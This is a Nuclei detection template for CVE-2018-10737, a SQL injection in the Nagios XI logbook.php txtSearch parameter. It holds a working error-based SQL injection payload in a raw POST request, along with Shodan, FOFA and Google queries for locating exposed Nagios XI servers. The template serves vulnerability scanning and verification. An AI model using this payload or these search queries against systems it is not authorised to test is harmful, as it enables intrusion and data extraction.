nuclei-templates/http/cves/2018/CVE-2018-10737.yaml

49 lines
1.6 KiB
YAML

id: CVE-2018-10737
info:
name: NagiosXI <= 5.4.12 logbook.php SQL injection
author: DhiyaneshDK
severity: high
description: |
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
reference:
- https://vulners.com/seebug/SSV:97267
- https://nvd.nist.gov/vuln/detail/CVE-2018-10737
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2018-10737
cwe-id: CWE-89
epss-score: 0.00403
epss-percentile: 0.7323
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: nagios
product: nagios_xi
shodan-query: http.title:"nagios xi"
fofa-query:
- app="Nagios-XI"
- title="nagios xi"
- app="nagios-xi"
google-query: intitle:"nagios xi"
tags: cve,cve2018,nagios,sqli
variables:
num: "{{rand_int(2000000000, 2100000000)}}"
http:
- raw:
- |
POST /nagiosql/admin/logbook.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
# digest: 4a0a0047304502202f133a4099b185a18cfefaa3ceb1a63edcd4505b939310fbe976681c8e6d0e80022100fdc8e91e5b09fe096ee74cd86983878a072ed1e682531d6b936180afec270de8:922c64590222798bb761d5b6d8e72950